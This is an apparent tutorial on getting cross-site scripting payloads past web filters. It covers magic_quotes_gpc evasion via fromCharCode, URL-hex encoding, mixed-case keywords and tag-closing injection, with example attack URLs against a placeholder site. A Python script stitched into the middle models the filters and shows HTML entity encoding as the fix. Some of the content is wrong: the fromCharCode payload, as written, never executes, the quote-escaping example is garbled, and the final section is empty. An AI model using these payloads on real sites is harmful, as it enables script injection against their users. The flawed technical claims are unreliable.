Bypassing the XSS Filters
Sometimes website owners use XSS filters (WAFs) to protect against XSS vulnerabilities.
For example, if you put <script>alert("hi")</script> into a field, the filter will escape the " (quote) character, so the script becomes:
<script>alert(>xss detected<)</script>
Now this script won't work. Likewise, filters use different types of filtering methods to protect against XSS. In such cases we can use some tricks to bypass the filter, and that is all I am going to cover here.
1. Bypassing magic_quotes_gpc
magic_quotes_gpc=ON is a PHP setting (configured in the php.ini file); it automatically escapes every ' (single quote), " (double quote) and \ (backslash) with a backslash.
For example:
<script>alert("hi");</script> will be filtered as <script>alert(\"hi\");</script>, so the script won't work now.
We can easily bypass this filter by using ASCII character codes instead.
For example, alert("hi"); can be converted to:
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
So it just looks like this: <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
In this case there are no double quotes, single quotes or backslashes, so the filter has nothing to escape, and the script runs successfully.
2. HEX Encoding
We can encode our whole script as hex (URL-encoded) so that it isn't filtered.
For example, <script>alert("Hi");</script> converted to hex is:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Now put the code into the vulnerable site's request.
For example:
hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Converting to HEX:
This site will convert text to hex code: http://centricle.com/tools/ascii-hex/
3. Bypassing using Obfuscation
Some website admins put the words script and alert on a restricted-word list, so whenever you input these keywords the filter removes them and shows an error message like "you are not allowed to search this". This can be bypassed by changing the case of the keywords (obfuscation).
For example:
<ScRipt>ALeRt("hi");</sCRipT>
4. Closing Tag
Sometimes putting "> at the beginning of the code will work:
"><script>alert("Hi");</script>
This closes the previously opened tag and then opens our script tag.
Example:
hxxp://vulnerable-site/search?q="><script>alert("Ne0");</script>
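As an added example (not code from the original post), the following Python script models the three filters described in sections 1 to 4 and checks, for constructed inputs mirroring each bypass, whether a raw script tag still reaches the page. It assumes the server URL-decodes the parameter before filtering, and uses html.escape as the corrected, context-aware output encoding; the decode_first flag also shows the common mistake of encoding before decoding.

```python
import html
import re
from urllib.parse import unquote

# Constructed inputs modelled on the bypasses described above (not real traffic).
SAMPLES = {
    "plain": '<script>alert("hi");</script>',
    "fromcharcode": "<script>String.fromCharCode(97,108,101,114,116,40,34,104,105,34,41,59)</script>",
    "hex": "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e",
    "mixed_case": '<ScRipt>ALeRt("hi");</sCRipT>',
    "close_tag": '"><script>alert("Hi");</script>',
}


def magic_quotes(s: str) -> str:
    """magic_quotes_gpc style: backslash-escape quotes and backslashes only."""
    return s.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")


def keyword_blocklist(s: str) -> str:
    """Case-sensitive removal of restricted words, as in section 3."""
    for word in ("script", "alert"):
        s = s.replace(word, "")
    return s


def html_encode(s: str) -> str:
    """Context-aware fix: entity-encode for an HTML text or attribute context."""
    return html.escape(s, quote=True)


SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)


def survivors(filt, decode_first: bool = True) -> set:
    """Names of samples that still carry a raw <script tag after filtering.

    decode_first=True models a server that URL-decodes the parameter and then
    filters; False models a filter applied to the raw, still-encoded value.
    """
    out = set()
    for name, raw in SAMPLES.items():
        rendered = filt(unquote(raw)) if decode_first else unquote(filt(raw))
        if SCRIPT_TAG.search(rendered):
            out.add(name)
    return out


if __name__ == "__main__":
    for label, f in (("magic_quotes", magic_quotes), ("blocklist", keyword_blocklist), ("html_encode", html_encode)):
        print(f"{label:12} survivors: {sorted(survivors(f))}")
    print("html_encode before decoding:", sorted(survivors(html_encode, decode_first=False)))
```

Only entity encoding applied after all decoding neutralizes every sample; quote escaping and a case-sensitive word list leave the tag intact, and even the correct encoder fails on the hex sample when it runs before the parameter is decoded.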
5. Some more filter bypass strings